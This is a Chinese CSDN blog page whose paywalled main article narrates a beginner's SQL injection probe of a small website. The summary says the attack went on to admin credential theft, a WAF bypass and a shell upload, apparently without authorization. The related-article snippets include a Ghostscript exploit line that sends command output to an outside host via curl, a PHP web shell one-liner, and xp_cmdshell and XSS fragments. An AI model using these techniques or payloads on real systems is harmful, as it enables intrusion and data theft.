【萌新】记录一次渗透小站的过程

最新推荐文章于 2024-07-22 12:01:57 发布
最新推荐文章于 2024-07-22 12:01:57 发布
阅读量1k 收藏 6
点赞数
分类专栏: web渗透 文章标签: web渗透 信息安全 信息安全入门 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Leep0rt/article/details/77886906
版权
本文记录了一位新手在渗透测试过程中,通过URL的特殊字段发现SQL注入点,利用云锁漏洞成功获取到网站管理员的用户名和密码,随后找到后台并尝试上传shell,最终成功绕过云锁防护的故事。这是一次信息安全入门实践的案例。
摘要由CSDN通过智能技术生成

一开始接触该站



先随便翻阅了一些目录

发现在URL中 “/ProductView.asp?ID=1021    ” 这几个字段格外引人瞩目

于是 二话不说 看看有没有注入点

输入一个  '  看一看  发现报错了!!!

然后惯例 and 1=1, and 1=11

最低0.47元/天 解锁文章
Leep0rt
关注
专栏目录
渗透实例】记录一次XSS渗透过程
TeamsSix 的 CSDN 空间
07-03 2404
0x01 找到存在XSS的位置 没什么技巧,见到框就X,功夫不负有心人,在目标网编辑收货地址处发现了存在XSS的地方,没想到这种大公司还会存在XSS。 [外链图片转存失败(img-qUL3DxC1-1562166261579)(https://mp.csdn.net/mdeditor/1)] 0x02 构造XSS代码连接到XSS平台 XSS平台给我们的XSS代码是这样的: </tExt...
SQL注入中利用XP_cmdshell提权的用法
得峰的专栏 [网络收藏]
05-15 2626
先来介绍一下子服务器的基本情况,windows 2000 adv server 中文版,据称打过了sp3,asp+iis+mssql 。首先扫描了一下子端口,呵呵,开始的一般步骤。端口21开放: FTP (Control)端口80开放: HTTP, World Wide Web端口135开放: Location Service端口139开放: NETBIOS Session Service端口14
一次渗透测试实战记录
最新发布
Locosomnus的博客
07-22 765
记录一下,只是记录一下
一次渗透的具体过程
yaasshole
04-04 544
渗透的具体过程 朋友做了一个财务部门的项目,今天叫我来做免费的渗透测试,下面来谈谈这次的过程和体会。先来介绍一下子服务器的基本情况,windows2000advserver中文版,据称打过了sp3,asp+iis+mssql。首先扫描了一下子端口,呵呵,开始的一般步骤。端口21开放:FTP(Control)端口80开放:HTTP,WorldWideWeb端口135开放:LocationServ...
记录一次模拟渗透
0verWatch的博客
07-25 595
前言 今天还模拟了一次真实的挖洞过程,今天这网一共有三个漏洞(都是要经过提醒才能弄出来),因为是搭的环境,简单记录一下思路,顺便当个回顾,源码啥的都没有了,耍完就要求删掉了。 正文 这台服务器有个前提就是跟我们一个网段的服务器,并且开了IIS服务,但是前提我们是不知道他的ip的,这个时候我们需要用一下nmap来扫一下同一网段下的ip nmap -sP -PI -PT 192.16...
关于网络渗透过程以及感想记录
m0_50987622的博客
12-28 2971
12.28 这个网是我很早之前就想攻下的,经历大概如下: 1、想借着ctf的劲头去黑此网,但是失败,原因是,ctf跟实战完全是两码子事儿啊!
S-LOVE多端恋爱小站小程序源码 uniapp多端
06-11
总结来说,“S-LOVE多端恋爱小站小程序”是uniapp框架下的一次成功实践,它展示了如何利用uniapp进行多端开发,实现了在H5和微信小程序平台上的无缝切换。对于想要学习uniapp或者恋爱小站类应用开发的开发者来说,这...
一种NR无线小站的同步设计与实现.docx
07-08
无线分布式小站作为5G NR室分解决方案的新形态,通过移频技术将高频5G信号转化为低频无线信号,以适应室内覆盖需求。这种无线分布式小站由主单元PAU和分布式单元PRU构成,主单元接收宏的高频信号,经过下变频处理...
5G一体化小站技术需求白皮书
10-07
"5G一体化小站技术需求白皮书" 这份白皮书的主要内容是关于5G一体化小站技术的需求规范,...本白皮书对5G一体化小站技术的需求和应用进行了详细的描述,提供了一个全面的技术指南,旨在帮助5G小站设备的研发和生产。
一次简单的渗透测试流程
qq_45773001的博客
07-21 740
一次简单的渗透测试(从信息收集到远程桌面登录) 一.信息收集 你是否做了足够的信息收集? 第一次拿到这个页面之后尝试了用一些常用的密码登录,发现不可以登录; 之后查看页面源代码,审查元素发现得到一些信息,他是php语言,用的是IIS7.5; 然后进行端口扫描,目录爆破;(这里使用nmap和御剑) 扫描目录后发现www,zip是网所有的目录,审查的时候发现了账号密码; 二.网页中的敏感信息 网中经常会有一些敏感信息泄露出来 三.登录网之后有没有新的漏洞发现 登录成功之后可以利用bp抓包分
渗透测试全过程
11-06
描述了渗透测试从信息收集、实施、渗透收尾的全部流程
渗透测试全过程记录
12-04
我先感慨一下,在做网络安全这些年感觉一直在漂,从05年刚到北京的远东到08年的大连,再到11年的启明,没有一个地方能让人感到是在踏实的做安全,对网络安全人才这块也都不重视。从圈内群的好友里得知,有很多技术水平很不错的朋友都闲置在家,为什么?我感觉国内的大环境都是这样的,所以出现了2011年底的各大网密码泄露事件。我认为,泄露的那些库也只是九牛之一毛。在这个拿网络安全人才当民工的时代,也许这个事件算是给那些高傲的、高薪的程序员上的一堂课吧。
一次渗透经历
wuliyouMaozhi的博客
08-31 544
每一个参数都有可能是我们渗透成功的利刃,不要因为个别参数不行而放弃所有参数。
一次初级渗透测试模拟过程
大方子
10-07 1289
0x00 前言       网络安全攻防赛是一种国际流行的竞技模式,自2014年在国内升温,发展到现在,深受各大高校和安全企业的青睐。参赛者在竞技过程中能够更大的限度的收获专业知识、激发潜能。为了让更多人切身体会到网络安全攻防赛,这次我们模拟了一次初级渗透测试攻防赛的过程。   0x01 模拟环境   实验环境: · 外网1: 192.168.15.53 · 外网2: 192.168...
记录一次常规的渗透测试
我想做一个好人<svg/onload=Alert`1`>(
06-01 439
首先是魔图漏洞 %!PS userdict /setpagedevice undef save legal { null restore } stopped { pop } if { legal } stopped { pop } if restore mark /OutputFile (%pipe%curl http://dnslog.cn/`whomai`) currentdevice putdeviceprops 然后windows下载后门。 方法1:certutil.exe -urlca
对某小程序的一次渗透记录
布啦啦
03-25 711
最近报了一个驾校,然后在报名回家以后,就开始疯狂的挂科目一的时长,突然想到这个小程序会不会存在漏洞呢,如果发现了,还可以去CNVD(https://www.cnvd.org.cn/)报一下,一是拿个积分,二是间接修复一下漏洞,毕竟自己的所有信息都在这个小程序里,不想自己有一天因为它存在什么漏洞,导致自己的信息被人偷走,所以本着保护自己的原则,我开始了一次【试探】。具体是哪个小程序,这里我就不说啦,漏洞已经报到CNVD了,写本文只是做一个分享。
记录一次渗透测试全过程
weixin_30730151的博客
12-18 613
一、信息收集:   1、巡风扫漏洞看到一个80端口开放,上去看一看,任意文件上传。   2、巡风扫漏洞还看到一个phpmyadmin弱口令,版本很老。 二、任意文件上传:   1、上传php文件:  <?php @system($_GET("cmd")) ?> /* 合理合法过程要接受检查,不然还是传post,默认不记日志 上传路径在下载页面可以爆出...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值